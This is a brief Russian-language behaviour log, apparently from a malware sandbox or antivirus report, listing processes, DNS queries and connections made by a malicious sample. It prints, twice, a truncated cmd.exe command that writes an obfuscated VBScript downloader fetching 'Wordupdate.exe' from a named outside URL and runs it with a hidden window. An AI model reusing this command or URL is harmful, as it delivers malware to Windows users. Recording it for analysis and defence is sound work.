Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO E3g= "https://arikansigorta.com.tr/images/pictures/Wordupdate.exe">>U0k.VBS &@ECHO L9q = J7j("h\G^q^")>>U0k.VBS &@ECHO Set D8t = CreateObject(J7j("flqfeKGqfeammi"))>>U0k.VB...
- %TEMP%\u0k.vbs
- %TEMP%\u0k.vbs
- 'ar#####igorta.com.tr':443
- 'r3.#.lencr.org':80
- 'oc##.thawte.com':80
- 'oc##.#tartssl.com':80
- 'ar#####igorta.com.tr':443
- DNS ASK ar#####igorta.com.tr
- DNS ASK r3.#.lencr.org
- DNS ASK st####.rapidssl.com
- DNS ASK oc##.thawte.com
- DNS ASK oc##.#tartssl.com
- '<SYSTEM32>\wscript.exe' "%TEMP%\U0k.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @ECHO E3g= "https://arikansigorta.com.tr/images/pictures/Wordupdate.exe">>U0k.VBS &@ECHO L9q = J7j("h\G^q^")>>U0k.VBS &@ECHO Set D8t = CreateObject(J7j("flqfeKGqfeammi"))>>U0k.VB...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13